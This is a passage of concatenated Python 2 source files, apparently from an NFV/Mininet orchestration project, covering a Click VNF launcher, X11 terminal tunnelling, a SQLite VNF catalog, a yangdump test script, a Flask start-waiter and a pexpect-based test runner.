Execute previously assembled VNF command.
output: -1: fork failed, high error code: invalid argument
"""
print self.startCmd
# return os.system(self.startCmd)
# return subprocess.call(['sh', '-c', self.startCmd])
proc = subprocess.Popen(['sh', '-c', self.startCmd])
self.click_proc = proc
# blocking parent
output, error = proc.communicate()
exitcode = proc.wait()
return output, error, exitcode
def kill_click_proc (self):
if self.click_proc is None:
pass
else:
print "Kill click process, PID: %s" % self.click_proc.pid
self.click_proc.kill()
if __name__ == "__main__":
ch = ClickHelper()
ch.initVNF()
ch.logVNFCmd()
(output, error, exitcode) = ch.startVNF()
print output
print error
print exitcode
```
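The key=value argument format expected by `ClickHelper._parse_args` behaves roughly like the stand-alone sketch below (the argument values are invented for illustration):
```python
# Mimics the netconfd-style command line parsed by ClickHelper above.
argv = ['type=simpleForwarder', 'vnf_id=ee1', 'dev_0=ee1_eth1', 'dev_1=ee1_eth2']

opts = dict(token.split('=') for token in argv)
devs = [opts[k] for k in sorted(k for k in opts if k.startswith('dev'))]
opts['devs'] = devs
# opts -> {'type': 'simpleForwarder', 'vnf_id': 'ee1',
#          'dev_0': 'ee1_eth1', 'dev_1': 'ee1_eth2',
#          'devs': ['ee1_eth1', 'ee1_eth2']}
```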
#### File: mininet/mininet/term.py
```python
from os import environ
from mininet.log import error
from mininet.util import quietRun, errRun
def tunnelX11( node, display=None):
"""Create an X11 tunnel from node:6000 to the root host
display: display on root host (optional)
returns: node $DISPLAY, Popen object for tunnel"""
if display is None and 'DISPLAY' in environ:
display = environ[ 'DISPLAY' ]
if display is None:
error( "Error: Cannot connect to display\n" )
return None, None
host, screen = display.split( ':' )
# Unix sockets should work
if not host or host == 'unix':
# GDM3 doesn't put credentials in .Xauthority,
# so allow root to just connect
quietRun( 'xhost +si:localuser:root' )
return display, None
else:
# Create a tunnel for the TCP connection
port = 6000 + int( float( screen ) )
connection = r'TCP\:%s\:%s' % ( host, port )
cmd = [ "socat", "TCP-LISTEN:%d,fork,reuseaddr" % port,
"EXEC:'mnexec -a 1 socat STDIO %s'" % connection ]
return 'localhost:' + screen, node.popen( cmd )
def makeTerm( node, title='Node', term='xterm', display=None, cmd='bash'):
"""Create an X11 tunnel to the node and start up a terminal.
node: Node object
title: base title
term: 'xterm' or 'gterm'
returns: two Popen objects, tunnel and terminal"""
title = '"%s: %s"' % (title, node.name)
if not node.inNamespace:
title += ' (root)'
cmds = {
'xterm': [ 'xterm', '-title', title, '-display' ],
'gterm': [ 'gnome-terminal', '--title', title, '--display' ]
}
if term not in cmds:
error( 'invalid terminal type: %s' % term )
return
display, tunnel = tunnelX11( node, display )
if display is None:
return []
term = node.popen(cmds[term] +
[display, '-e', 'env TERM=ansi %s' % cmd])
return [ tunnel, term ] if tunnel else [ term ]
def runX11( node, cmd ):
"Run an X11 client on a node"
_display, tunnel = tunnelX11( node )
if _display is None:
return []
popen = node.popen( cmd )
return [ tunnel, popen ]
def cleanUpScreens():
"Remove moldy socat X11 tunnels."
errRun( "pkill -9 -f mnexec.*socat" )
def makeTerms( nodes, title='Node', term='xterm' ):
"""Create terminals.
nodes: list of Node objects
title: base title for each
returns: list of created tunnel/terminal processes"""
terms = []
for node in nodes:
terms += makeTerm( node, title, term )
return terms
```
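Typical use of the terminal helpers above from a Mininet script (a sketch; `net` is assumed to be an already built Mininet network object):
```python
from mininet.term import makeTerms, cleanUpScreens

terms = makeTerms(net.hosts, title='VNF host')  # one xterm/tunnel per host
# ... interact with the terminals ...
for proc in terms:
    proc.kill()                                 # close terminals and tunnels
cleanUpScreens()                                # remove leftover socat tunnels
```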
#### File: mininet/mininet/vnfcatalog.py
```python
import copy
import inspect
import os
import sqlite3
from log import error
# Singleton: not used currently
class Singleton(type):
_instances = {}
def __call__ (cls, *args, **kwargs):
if cls not in cls._instances:
cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)
return cls._instances[cls]
class Catalog(object):
"""
Catalog of VNFs.
"""
__shared_state = {}
# __metaclass__ = Singleton
def __init__ (self, filename=None):
self.__dict__ = self.__shared_state
if len(Catalog.__shared_state) == 0:
self.db = {}
self.set_filename(filename)
self.load()
def set_filename (self, filename=None):
if filename:
self.filename = filename
return
this_file = os.path.abspath(inspect.getfile(inspect.currentframe()))
dirname = os.path.dirname(this_file)
self.filename = os.path.join(dirname, 'vnfcatalogue.db')
return
def load (self, filename=None):
if not filename:
filename = self.filename
self.conn = sqlite3.connect(filename)
cur = self.conn.cursor()
cur.execute('''create table if not exists VNFs (name text, type text,
description
text, command text, readHdr text, writeHdr text, dependency text,
icon text, builder_class text, hidden text)''')
self.db = {}
data = self.query_db("SELECT * FROM VNFs")
for metadata in data:
try:
self.db[metadata['name']] = metadata
except KeyError:
error('invalid vnf data: %s' % metadata)
def get_db (self):
"""
Return the list of metadata for VNFs available to launch.
"""
# don't let callers mess with our database
return copy.deepcopy(self.db)
def make_cmd (self, vnf_name, **kw):
"""
Return a command line that starts 'vnf_name'.
"""
try:
metadata = copy.deepcopy(self.db[vnf_name])
vnf_type = metadata['type']
cls_name = 'Vnf' + vnf_type
cls = globals()[cls_name]
except KeyError:
raise RuntimeError('VNF not found (%s)' % vnf_name)
metadata.update(kw)
c = cls()
return c.make_cmd(**metadata)
def query_db (self, sql):
data = []
try:
cur = self.conn.cursor()
cur.execute(sql)
column_names = [x[0] for x in cur.description]
while True:
row = cur.fetchone()
if row is None:
break
dictionary = dict(zip(column_names, row))
data.append(dictionary)
except KeyError:
error('Cannot query the Data Base')
return data
def add_VNF (self, **kwargs):
"""
Interface to add new VNF to the Catalog DB.
"""
vnf_name = kwargs.get('vnf_name', '')
vnf_type = kwargs.get('vnf_type', '')
if self.db.get(vnf_name, ''):
error('VNF %s exists \n' % vnf_name)
return
cls_name = 'Vnf' + vnf_type
cls = globals()[cls_name]
c = cls()
return c.add_VNF(self, **kwargs)
def remove_VNF (self, **kwargs):
"""
Interface to remove VNF from Catalog DB.
"""
vnf_name = kwargs.get('vnf_name', '')
# First check the dependencies.
data = self.query_db("SELECT * FROM VNFs")
for metadata in data:
dependency = eval(metadata['dependency'])
for element in dependency:
if element == vnf_name:
error("VNF cannot be removed. There is a dependency")
return
del self.db[vnf_name]
cur = self.conn.cursor()
name = (vnf_name,)
cur.execute('DELETE FROM VNFs WHERE name = ?', name)
self.conn.commit()
def get_VNF (self, vnf_name):
"""
Interface to get attributes of VNF from Catalog DB given by name.
"""
data = []
name = (vnf_name,)
sql = "SELECT * FROM VNFs WHERE name = ?"
try:
cur = self.conn.cursor()
cur.execute(sql, name)
column_names = [x[0] for x in cur.description]
while True:
row = cur.fetchone()
if row is None:
break
dictionary = dict(zip(column_names, row))
data.append(dictionary)
except KeyError:
error('Cannot query the Data Base')
return data
class VnfClick(object):
"""
Helper object for convenient launching of click-based vnfs.
"""
# __metaclass__ = Singleton
def __init__ (self):
pass
def make_cmd (self, **kwargs):
self.clickCmd = kwargs.get('clickCmd', '')
self.clickPath = kwargs.get('clickPath', '')
self.hotConfig = kwargs.get('hotConfig', True)
self.controlSocket = kwargs.get('controlSocket', True)
self.csPort = kwargs.get('csPort', 8001)
self.vnfName = kwargs.get('name', '')
# self.clickExp = kwargs.get( 'command', '' )
self.clickExp = self.instantiate_VNF(**kwargs)
self.clickFile = kwargs.get('clickFile', '')
self.output = kwargs.get('output', True)
# self.mac = kwargs.get( 'mac', '' )
if self.clickCmd:
return self.clickCmd + ' &'
if self.clickPath:
self.clickCmd = self.clickPath + '/click'
else:
self.clickCmd = 'click'
if self.hotConfig:
self.clickCmd += ' -R'
if self.controlSocket:
self.clickCmd = self.clickCmd + ' -p' + str(self.csPort)
# if self.vnfName:
# self.clickCmd = self.clickCmd + ' VNFNAME=' + self.vnfName
# if self.mac:
# self.clickExp = self.clickExp.replace('\$MAC', self.mac)
# self.clickCmd = self.clickCmd + ' MAC=' + self.mac
if self.clickFile:
self.clickCmd = self.clickCmd + ' -f ' + self.clickFile
else:
# self.clickExp = self.clickExp.replace('\$VNFNAME', self.vnfName)
self.clickCmd = self.clickCmd + ' -e "' + self.clickExp + '"'
if self.output:
return self.clickCmd + ' 2> ' + '/tmp/' + self.vnfName + '-' + str(
self.csPort) + '.log &'
else:
return self.clickCmd + ' &'
def add_VNF (self, catalog, **kwargs):
this_file = os.path.abspath(inspect.getfile(inspect.currentframe()))
dirname = os.path.dirname(this_file)
self.vnfName = kwargs.get('vnf_name', '')
self.vnfType = kwargs.get('vnf_type', '')
self.clickTempPath = kwargs.get('clickTempPath',
dirname + '/templates/' + self.vnfName +
'.jinja2')
self.clickPath = kwargs.get('clickPath', '')
self.clickSource = kwargs.get('clickSource', '')
self.vnfDescription = kwargs.get('description', '')
self.icon = kwargs.get('icon', '')
self.builder_class = kwargs.get('builder_class', 'VNFClickBuilder')
self.hidden = kwargs.get('hidden', 'False')
# 1. First check if the source can be compiled
if self.clickSource:
if not self.compile(**kwargs):
return False
# 2. Check the existence of the required VNFs/Click elements
dependency = []
if os.path.exists(self.clickTempPath):
with open(self.clickTempPath) as template:
# It is assumed that elements are defined in the click scripts using
# "::"
for line in template:
if '::' in line:
element = line.split('::')[-1].split('(')[0].replace(' ', '')
name = (str(element),)
cur = catalog.conn.cursor()
cur.execute('SELECT * FROM VNFs WHERE name = ?', name)
VNF = cur.fetchone()
if VNF:
dependency.append(str(element))
else:
error('The new VNF is dependent on non-existing VNF:%s' % element)
return False
template = open(self.clickTempPath, 'r').read()
else:
template = ''
# 3. Extract the Click handlers from the source files (The handlers
# are used for configuration of VNFs)
read_handlers = {}
read = []
write_handlers = {}
write = []
for src in self.clickSource:
if '.cc' in src:
with open(self.clickPath + '/' + src) as source:
for line in source:
if 'add_read_handler' in line:
hdlr = line.split('"')[1]
if hdlr not in read:
read.append(hdlr)
if 'add_write_handler' in line:
hdlr = line.split('"')[1]
if hdlr not in write:
write.append(hdlr)
if read:
read_handlers[self.vnfName] = read
if write:
write_handlers[self.vnfName] = write
# Add the handlers of other elements used in the Click scripts of the new
# VNF
if dependency:
for element in dependency:
name = (element,)
cur = catalog.conn.cursor()
cur.execute('SELECT * FROM VNFs WHERE name = ?', name)
VNF = cur.fetchone()
read = eval(VNF[4]).get(element, '')
write = eval(VNF[5]).get(element, '')
if read:
read_handlers[element] = read
if write:
write_handlers[element] = write
# ToDo: the type of the parameters for the handlers should be
# determined (now only the handlers names are extracted from the
# source files)
# 4. Add to the DataBase
cur = catalog.conn.cursor()
sql = (self.vnfName, self.vnfType, self.vnfDescription, str(template),
repr(read_handlers), repr(write_handlers), repr(dependency),
self.icon, self.builder_class, self.hidden)
cur.execute('INSERT INTO VNFs VALUES (?,?,?,?,?,?,?,?,?,?)', sql)
catalog.conn.commit()
def instantiate_VNF (self, **kwargs):
"""
Instantiate the VNF (Click script) with the given parameters.
"""
from jinja2 import Template
self.clickExp = kwargs.get('command', '')
# all the required parameters for instantiation of the Click scripts
# should be set here
self.vnfDevs = kwargs.get('devs', [])
if self.vnfDevs == []:
# static use-case, single device name is derived from vnf name
self.vnfDevs = [self.vnfName + '-eth1']
self.dev = kwargs.get('device', '')
self.method = kwargs.get('method', 'PCAP')
self.daddress = kwargs.get('daddress', '10.0.0.5')
self.interval = kwargs.get('interval', '1')
self.limit = kwargs.get('limit', '-1')
self.gw = kwargs.get('gw', self.vnfDevs[0] + ':gw')
self.mac = kwargs.get('mac', '')
self.public = kwargs.get('public', '')
templateVars = {
'DEV': self.dev, 'METHOD': self.method,
'DADDR': self.daddress, 'INTERVAL': self.interval,
'LIMIT': self.limit, 'GW': self.gw, 'MAC': self.mac,
'public': self.public
}
for i, dev in enumerate(self.vnfDevs):
templ = 'VNFDEV' + str(i)
templateVars[templ] = dev
template = Template(self.clickExp)
return template.render(templateVars)
# return template.render(DEV=self.dev,METHOD=self.method,
# DADDR=self.daddress,
# INTERVAL=self.interval,LIMIT=self.limit,GW=self.gw,
# MAC=self.mac,public=self.public)
def compile (self, **kwargs):
"""
Given the source code of a new Click element, the code is compiled.
"""
# should be checked!, Currently user level is considered
# First check if the source files exist
for src in self.clickSource:
if not os.path.exists(self.clickPath + '/' + src):
error('source file does not exist: %s' % src)
return False
os.system(
'cd ' + self.clickPath + '; make clean; ./configure; make elemlist; make')
if not os.path.exists(self.clickPath + '/userlevel/click'):
error('The source code can not be compiled')
return False
else:
print "Successful compile!"
return True
class VnfLookBusy(object):
"""
Helper object for launching complex LookBusy commands.
"""
def make_cmd (self, **kw):
"Assemble a complex lookbusy commandline."
args = ['verbose', 'quiet', 'cpu-util', 'ncpus', 'cpu-mode',
'cpu-curve-period', 'cpu-curve-peak', 'utc', 'mem-util',
'mem-sleep', 'disk-util', 'disk-sleep', 'disk-block-size',
'disk-path']
cmd = 'lookbusy'
for k, v in kw.iteritems():
arg = k.replace('_', '-')
if arg in args:
cmd += ' --%s %s' % (arg, v)
else:
error('lookbusy: unknown argument (%s)\n' % k)
return cmd + ' &'
class VnfFakeLoad(object):
"""
Helper object for convenient launching of LookBusy.
"""
def make_cmd (self, cpu='', mem='', **kw):
"""Generate load for testing VNF load balancers.
:param kw:
:param mem:
:param cpu:
"""
cmd = 'lookbusy'
if cpu:
cmd = cmd + ' -c ' + cpu
if mem:
cmd = cmd + ' -m ' + mem
return cmd + ' &'
class VnfNetConf(object):
"""
Helper object for convenient launching of NetConf-based managers.
"""
__shared_state = {'start_port': 830}
def __init__ (self, start_port=None):
self.__dict__ = self.__shared_state
if start_port:
self.start_port = start_port
def make_cmd (self, **kwargs):
close = kwargs.get('close', True)
cmd = 'netconfd --module=starter --log=/home/unify/mylog'
cmd += ' --log-level=debug4 --superuser=unify'
cmd += ' --port=' + str(self.start_port)
self.start_port += 1
if close:
print(cmd + ' &')
return cmd + ' &'
else:
return cmd
class VnfOVS(object):
"""
Helper object for convenient launching of OVS-based vnfs.
"""
# __metaclass__ = Singleton
def __init__ (self):
pass
def make_cmd (self, **kwargs):
self.vnfName = kwargs.get('name', '')
self.OVSExp = self.instantiate_VNF(**kwargs)
self.cmd = "sudo /bin/sh -c "
self.cmd = self.cmd + "'" + self.OVSExp + "'"
return self.cmd + ' &'
def add_VNF (self, catalog, **kwargs):
this_file = os.path.abspath(inspect.getfile(inspect.currentframe()))
dirname = os.path.dirname(this_file)
self.vnfName = kwargs.get('vnf_name', '')
self.vnfType = kwargs.get('vnf_type', '')
self.read_handlers = []
self.write_handlers = []
self.dependency = []
self.TempPath = kwargs.get('TempPath',
dirname + '/templates/' + self.vnfName +
'.jinja2')
self.vnfDescription = kwargs.get('description', '')
self.icon = kwargs.get('icon', '')
self.builder_class = kwargs.get('builder_class', '')
self.hidden = kwargs.get('hidden', '')
if os.path.exists(self.TempPath):
template = open(self.TempPath, 'r').read()
else:
template = ''
# Add to the DataBase
cur = catalog.conn.cursor()
sql = (self.vnfName, self.vnfType, self.vnfDescription, str(template),
repr(self.read_handlers), repr(self.write_handlers),
repr(self.dependency),
self.icon, self.builder_class, self.hidden)
cur.execute('INSERT INTO VNFs VALUES (?,?,?,?,?,?,?,?,?,?)', sql)
catalog.conn.commit()
def instantiate_VNF (self, **kwargs):
"""
Instantiate the VNF (OVS script) with the given parameters.
"""
from jinja2 import Template
self.OVSExp = kwargs.get('command', '')
# all the required parameters for instantiation of the OVS scripts
# should be set here
self.sw = kwargs.get('swName', 's1')
self.ctrlIP = kwargs.get('ctrlIP', '10.0.10.100')
self.ctrlPort = kwargs.get('ctrlPort', '6633')
self.ports = kwargs.get('ports', [])
self.vnfDevs = kwargs.get('devs', [])
if self.vnfDevs:
# explicit 'devs' take precedence over 'ports'
self.ports = []
for dev in self.vnfDevs:
self.ports.append({'name': dev})
elif not self.ports:
# static use-case, single device name is derived from vnf name
self.ports = [{'name': self.vnfName + '-eth1'}]
template = Template(self.OVSExp)
return template.render(sw=self.sw, ctrlIP=self.ctrlIP,
ctrlPort=self.ctrlPort,
ports=self.ports)
```
#### File: mininet/mininet/vnfcatalog-reset.py
```python
from vnfcatalog import Catalog
def del_VNFs (vnf_list):
for vnf in vnf_list:
if Catalog().get_VNF(vnf_name=vnf):
Catalog().remove_VNF(vnf_name=vnf)
def add_VNFs ():
""" add VNFs to catalog (required parameters should be given) """
# 1. First single Click elements are added to the DB
Catalog().add_VNF(vnf_name='FromDevice', vnf_type='Click', hidden='True')
Catalog().add_VNF(vnf_name='ToDevice', vnf_type='Click', hidden='True')
Catalog().add_VNF(vnf_name='Queue', vnf_type='Click', hidden='True')
Catalog().add_VNF(vnf_name='Tee', vnf_type='Click', hidden='True')
# Catalog().add_VNF(vnf_name='Counter',vnf_type='Click',
# clickPath='/home/click',
# clickSource=['elements/standard/counter.cc',
# 'elements/standard/counter.cc'])
Catalog().add_VNF(vnf_name='Counter', vnf_type='Click', hidden='True')
Catalog().add_VNF(vnf_name='Classifier', vnf_type='Click', hidden='True')
Catalog().add_VNF(vnf_name='IPClassifier', vnf_type='Click', hidden='True')
Catalog().add_VNF(vnf_name='ICMPPingSource', vnf_type='Click', hidden='True')
Catalog().add_VNF(vnf_name='ARPQuerier', vnf_type='Click', hidden='True')
Catalog().add_VNF(vnf_name='AggregateIPFlows', vnf_type='Click',
hidden='True')
Catalog().add_VNF(vnf_name='RFC2507Comp', vnf_type='Click', hidden='True')
Catalog().add_VNF(vnf_name='RFC2507Decomp', vnf_type='Click', hidden='True')
Catalog().add_VNF(vnf_name='IPAddRewriter', vnf_type='Click', hidden='True')
Catalog().add_VNF(vnf_name='TCPOptimizer', vnf_type='Click', hidden='True')
Catalog().add_VNF(vnf_name='MarkIPHeader', vnf_type='Click', hidden='True')
# 2. Then the VNFs composed of several Click elements are added to the DB
Catalog().add_VNF(vnf_name='simpleForwarder',
vnf_type='Click',
description='receive on the data interface and loop back '
'the packet',
icon='forward.png')
Catalog().add_VNF(vnf_name='simpleObservationPoint',
vnf_type='Click',
description='A simple observation point in click',
icon='search.png')
Catalog().add_VNF(vnf_name='headerCompressor',
vnf_type='Click',
description='Compress IPv4/TCP headers as defined in '
'RFC2507',
icon='decompress_small.png')
Catalog().add_VNF(vnf_name='headerDecompressor',
vnf_type='Click',
description='Decompress IPv4/TCP headers as defined in '
'RFC2507',
icon='compress2_small.png')
Catalog().add_VNF(vnf_name='nat',
vnf_type='Click',
hidden='True',
description='Provide the functionality of basic network '
'address translator')
Catalog().add_VNF(vnf_name='tcpRWINOptimizer',
vnf_type='Click',
description='TCP Optimizer',
icon='forward.png')
Catalog().add_VNF(vnf_name='ovs',
vnf_type='OVS',
description='OVS switch')
print Catalog().get_db()
if __name__ == '__main__':
del_VNFs(['simpleForwarder',
'simpleObservationPoint',
'headerCompressor',
'headerDecompressor',
'tcpRWINOptimizer',
'nat'])
add_VNFs()
```
#### File: test/ydump-test/ydump-test.py
```python
import sys
import os
import commands
import re
# ----------------------------------------------------------------------------|
YumaRootDir = "../../../netconf"
YumaModuleDir = YumaRootDir + "/modules"
YumaModPath = "YUMA_MODPATH=" + YumaModuleDir
YangdumpExe = YumaRootDir + "/target/bin/yangdump"
LdLibraryPath = "LD_LIBRARY_PATH=" + YumaRootDir + "/target/lib"
YangEnvSettings = LdLibraryPath + " " + YumaModPath + " "
TestOutputDir = "./yangdump-op"
# ----------------------------------------------------------------------------|
def InitialiseOutputDir():
"""Create / Clean the test output directory"""
commands.getoutput( "mkdir -p " + TestOutputDir )
commands.getoutput( "rm -rf " + TestOutputDir+"/*" )
# ----------------------------------------------------------------------------|
def RunYangDump( fmt ):
"""Run Yangdump over the yang files generating output in the
requested format"""
command = ( YangEnvSettings + YangdumpExe + " "
+ "subtree=" + YumaModuleDir+ "/ietf "
+ "subtree=" + YumaModuleDir+ "/netconfcentral "
+ "subtree=" + YumaModuleDir+ "/yang "
+ "subtree=" + YumaModuleDir+ "/test/pass "
+ "output=" + TestOutputDir + " "
+ "format="+fmt + " "
+ "defnames=true "
+ "log=" + TestOutputDir+"/test-"+fmt+".log "
+ "log-level=debug" )
print "Running command: %s" % command
commands.getoutput( command )
# ----------------------------------------------------------------------------|
def CountOccurrences ( searchText, data, ignoreCase = True ):
"""Crude count of the number of occurrences of searchText in data"""
if ignoreCase:
res = [ m.start() for m in re.finditer( searchText, data, re.IGNORECASE) ]
else:
res = [ m.start() for m in re.finditer( searchText, data ) ]
return len( res )
# ----------------------------------------------------------------------------|
def SummariseErrorsAndWarnings( data ):
"""Search for the line '*** # Errors, # Warnings' in the output file and
extract the count of errors and warnings reported"""
regex = re.compile( r"\*\*\* (\d+) Errors, (\d+) Warnings" )
errors = 0
warnings = 0
for m in re.findall( regex, data ):
errors += int( m[0] )
warnings += int( m[1] )
return (errors, warnings)
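# Illustrative sketch (not part of the original test script): the totals are
# accumulated over every summary line found in the log, e.g.
# >>> SummariseErrorsAndWarnings("*** 2 Errors, 5 Warnings\n"
# ...                            "*** 0 Errors, 1 Warnings\n")
# (2, 6)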
# ----------------------------------------------------------------------------|
def AnalyseOutput( fmt ):
"""Analyse the output log file for the specified yangdump format"""
filename = TestOutputDir + "/test-" + fmt + ".log"
print "Analysing Results From %s" % filename
f = open( filename, "r" )
data = f.read()
# get the number of errors and warnings
errors, warnings = SummariseErrorsAndWarnings( data )
# get the number of Segmentation Violations
# Note: this is based on the original makefile script, which
# simply greps for 'Segmentation' - any occurrence is assumed
# to indicate a segmentation fault
segmentCount = CountOccurrences( "Segmentation", data )
# get the number of occurrences of 'internal'
internalCount = CountOccurrences( "internal", data )
return ( errors, warnings, segmentCount, internalCount )
# ----------------------------------------------------------------------------|
def TestFormat( fmt ):
"""Test the specified format and collate the results"""
RunYangDump( fmt )
return AnalyseOutput( fmt )
# ----------------------------------------------------------------------------|
def TestYang():
results = {}
for fmt in [ "yin", "yang", "xsd", "sqldb", "html", "h", "c" ]:
result = TestFormat( fmt )
results[ fmt ] = result
return results
# ----------------------------------------------------------------------------|
def DisplayResults( results ):
colWid = 15
tabWid = 80
print "\n"
print "="*tabWid
print " The Results of running yangdump are summarised in the table below."
print "-"*tabWid
print ( " %s %s %s %s %s" % ( "Format".ljust(colWid),
"Errors".center(colWid),
"Warnings".center(colWid),
"Seg-Faults".center(colWid),
"Internal".center(colWid) ) )
totalErrors = 0
totalInternal = 0
totalSegFaults = 0
warningHighWaterMark = 89
warningHighWaterMarkExceeded = False
print "-"*tabWid
for k in sorted( results.keys() ):
res = results[k]
print ( " %s %s %s %s %s" % ( repr(k).ljust(colWid),
repr(res[0]).center(colWid),
repr(res[1]).center(colWid),
repr(res[2]).center(colWid),
repr(res[3]).center(colWid) ) )
totalErrors += res[0]
totalSegFaults += res[2]
totalInternal += res[3]
if res[1] > warningHighWaterMark:
warningHighWaterMarkExceeded = True
print "-"*tabWid
print " Note: Many yang files currently emit warnings."
print "-"*tabWid
errorOp = False
if totalErrors>0:
print "\033[31;1m Test Failed: There were %d errors \033[39;0m" % totalErrors
errorOp = True
if totalSegFaults>0:
print "\033[31;1m Test Failed: There were %d Segment Faults \033[39;0m" % totalSegFaults
errorOp = True
if totalInternal>0:
print "\033[31;1m Test Failed: There were %d internal errors \033[39;0m" % totalInternal
errorOp = True
if warningHighWaterMarkExceeded:
print "\033[31;1m Test Failed: Warning High Water Mark of %d Exceeded, \033[39;0m" % warningHighWaterMark
print "\033[31;1m New Warnings were introduced! \033[39;0m"
errorOp = True
if errorOp == False:
print "\033[39;1m Test Passed! \033[39;0m"
print "-"*tabWid
print "\n"
# ----------------------------------------------------------------------------|
if __name__ == '__main__':
print "Testing Yangdump for various formats"
InitialiseOutputDir()
results = TestYang()
DisplayResults( results )
```
#### File: 5GExchange/escape/start_waiter.py
```python
import hashlib
import pprint
from argparse import ArgumentParser
import yaml
from flask import Flask, request, Response
from flask_httpauth import HTTPBasicAuth
ESC_DEF_CFG = "escape-config.yaml"
DEFAULT_PORT = 8888
parser = ArgumentParser(description="Restart waiter",
add_help=True)
parser.add_argument("-c", "--config", default=ESC_DEF_CFG,
help="configuration for REST-API (default: %s)" %
ESC_DEF_CFG)
args, unknown = parser.parse_known_args()
CONFIG = {}
with open(ESC_DEF_CFG) as f:
esc_cfg = yaml.safe_load(f)
for key in ('host', 'port', 'auth_user', 'auth_secret', 'prefix'):
CONFIG[key] = esc_cfg['REST-API'][key]
if args.config:
with open(args.config) as f:
esc_cfg = yaml.safe_load(f)
for key in ('host', 'port', 'auth_user', 'auth_secret', 'prefix'):
try:
CONFIG[key] = esc_cfg['REST-API'][key]
except KeyError:
pass
print "Parsed configuration:"
pprint.pprint(CONFIG, indent=2)
app = Flask(__name__)
auth = HTTPBasicAuth()
@auth.hash_password
def hash_passwd (passwd):
return hashlib.md5(passwd).hexdigest()
@auth.get_password
def get_passwd (username):
if username == CONFIG['auth_user']:
return CONFIG['auth_secret']
print "Invalid username!"
@app.route("/%s/admin/start" % CONFIG['prefix'], methods=['GET', 'POST'])
@auth.login_required
def wait_for_exit ():
print "Authenticated!"
shutdown_func = request.environ.get('werkzeug.server.shutdown')
if shutdown_func is None:
raise RuntimeError('Not running with the Werkzeug Server')
else:
shutdown_func()
return Response("START accepted.\n")
if __name__ == "__main__":
try:
print "Waiting for start command..."
app.run(host=CONFIG['host'], port=CONFIG['port'])
except KeyboardInterrupt:
pass
print "Exit"
```
#### File: testframework/generator/generator.py
```python
from functools import partial
import e2e_reqs_for_testframework
import networkx_nffg_generator
import sg_generator
DEFAULT_SEED = 0
eight_loop_requests = partial(sg_generator.get_8loop_request,
abc_nf_types_len=10,
seed=DEFAULT_SEED,
eightloops=1)
complex_e2e_reqs = partial(e2e_reqs_for_testframework.main,
loops=False,
vnf_sharing=0.0,
seed=DEFAULT_SEED,
multiple_scs=False,
use_saps_once=False,
max_sc_count=2,
chain_maxlen=8,
max_cpu=4,
max_mem=1600,
max_storage=3,
max_bw=7,
max_e2e_lat_multiplier=20,
min_e2e_lat_multiplier=1.1)
networkx_resource_generator = partial(networkx_nffg_generator
.networkx_resource_generator,
seed=DEFAULT_SEED,
max_cpu=40, max_mem=16000,
max_storage=30, max_link_bw=70,
abc_nf_types_len=10,
supported_nf_cnt=6, max_link_delay=1,
sap_cnt=10)
balanced_tree_request = partial(sg_generator.get_balanced_tree, r=2, h=3,
seed=DEFAULT_SEED,
max_cpu=4, max_mem=1600,
max_storage=3,
max_link_bw=5,
min_link_delay=2,
abc_nf_types_len=10,
max_link_delay=4)
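# Illustrative sketch (assumption: the wrapped generators accept these
# keywords, as the pre-bound defaults above suggest): any default can be
# overridden at call time thanks to functools.partial, e.g.
# >>> eight_loop_requests(eightloops=3, seed=42)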
def networkx_request_generator (gen_func, seed=0, **kwargs):
"""
Chooses a built-in NetworkX topology generator which creates
request graph NFFG.
"""
return networkx_nffg_generator.networkx_request_generator(gen_func, seed=seed,
**kwargs)
```
#### File: test/testframework/runner.py
```python
import copy
import importlib
import logging
import os
import sys
import threading
from collections import Iterable
import pexpect
import yaml
from yaml.error import YAMLError
log = logging.getLogger()
class Tee(object):
"""
Inspired by the bash command: tee
tee - read from standard input and write to standard output and files
"""
def __init__ (self, filename):
super(Tee, self).__init__()
self.file = open(filename, mode="w", buffering=0)
self.stdout = sys.stdout
sys.stdout = self
def __del__ (self):
sys.stdout = self.stdout
self.file.close()
def write (self, data):
self.file.write(data)
self.stdout.write(data)
def __enter__ (self):
return self
def __exit__ (self, exc_type, exc_val, exc_tb):
self.__del__()
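# Illustrative sketch (hypothetical file name): while the context is active,
# everything printed goes both to stdout and to the given file, e.g.
# >>> with Tee("test-run.log"):
# ...   print "duplicated to console and file"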
class EscapeRunResult():
"""
Container class for storing the result of the test run.
"""
def __init__ (self, output=None, exception=None):
self.log_output = output
self.exception = exception
def was_error (self):
return self.exception is not None
def __iter__ (self):
return iter(self.log_output)
class CommandRunner(object):
"""
Main runner class which capable of running the test script and kill the
process explicitly or based on the timeout value.
"""
KILL_TIMEOUT = 60
def __init__ (self, cmd, cwd=None, kill_timeout=None, output_stream=None):
self._command = self.__evaluate_cmd(cmd)
self._cwd = cwd if cwd else os.path.dirname(__file__)
self.kill_timeout = kill_timeout if kill_timeout else self.KILL_TIMEOUT
self.output_stream = output_stream
self._process = None
self.__killed = False
def __str__ (self):
return "%s(cmd: %s, timeout: %s)" % (
self.__class__.__name__, self._command, self.kill_timeout)
@property
def is_killed (self):
return self.__killed
@property
def is_alive (self):
return self._process and self._process.isalive()
@staticmethod
def __evaluate_cmd (cmd):
"""
Split command to list for pexpect.
:param cmd: str or list
:rtype: list[str]
"""
if isinstance(cmd, basestring):
return cmd.split(' ')
elif isinstance(cmd, Iterable):
return list(cmd)
else:
return None
def execute (self):
"""
Create and start the process. Block until the process ends or timeout is
exceeded.
"""
try:
self._process = pexpect.spawn(self._command[0],
args=self._command[1:],
timeout=self.kill_timeout,
cwd=self._cwd,
logfile=self.output_stream)
self._process.expect(pexpect.EOF)
return self
except pexpect.TIMEOUT:
log.debug("Process running timeout(%ss) is exceeded!" % self.kill_timeout)
self.kill_process()
except pexpect.ExceptionPexpect as e:
log.error("Got unexpected error:\n%s" % e)
self.kill_process()
def kill_process (self):
"""
Kill the process and call the optional hook function.
"""
log.debug("Kill process...")
self.stop()
self.__killed = True
if self.is_alive:
self._process.terminate(force=True)
def stop (self):
"""
Stop the process.
:return: None
"""
log.debug("Terminate program under test: %s" % self)
if self._process:
self._process.sendcontrol('c')
if self.is_alive:
self._process.terminate()
def get_process_output_stream (self):
"""
:return: Return with the process buffer.
"""
return self._process.before if self._process.before else ""
def clone (self):
return copy.deepcopy(self)
def cleanup (self):
log.debug("Cleanup %s..." % self.__class__.__name__)
self._process = None
self.__killed = False
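# Illustrative sketch (hypothetical command): execute() blocks until EOF or
# the kill timeout, after which the captured output can be read back, e.g.
# >>> runner = CommandRunner(cmd="echo hello", kill_timeout=5)
# >>> runner.execute()
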